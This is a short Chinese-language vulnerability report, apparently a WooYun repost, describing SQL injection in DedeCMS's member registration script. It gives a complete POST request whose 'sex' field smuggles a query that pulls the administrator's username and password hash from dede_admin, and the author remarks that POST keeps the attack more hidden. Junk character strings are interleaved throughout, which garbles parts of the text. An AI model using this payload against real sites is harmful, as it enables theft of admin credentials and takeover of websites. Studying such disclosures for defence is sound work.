漏洞类型: SQL注射漏洞
9 B2 J- S N" _, d3 n简要描述:' Z) d- b% V- }" W" o' o/ `5 k
2 A, L2 U* w& ]' [
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.5 _+ h5 o8 a& j. o' e5 a* K7 O
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
9 Z' ~6 G5 u9 ~详细说明:跟这个漏洞
. B$ y! p- [! \/ H
0 A: c/ o- @; ~1 a5 |WooYun: Dedecms SQL注射导致审核机制绕过漏洞5 W* }0 d6 u! y2 D. Z
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.7 b$ e3 }# F" z9 S; p
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
_: ^. C+ D- V: v: [ % f) }! I& m! `5 d2 Q
www.political-security.com/member/reg_new.php8 n M4 y# ]: t
! o" b$ m5 W1 FPOST2 {0 c. Q( A& h) \6 M
) f5 c e2 M# Y! ~% E
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
, r; O8 u: v# Ouserid=c4rp3nt3r&uname=c4rp3nt3r
2 R! `+ j+ b: X# G" m# B# ^&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss, [) Z* s" A3 @8 _/ K7 o
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,* w% S; q2 L2 C+ E
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');! x4 H$ h, T7 M. n
%00&vdcode=glos&agree= |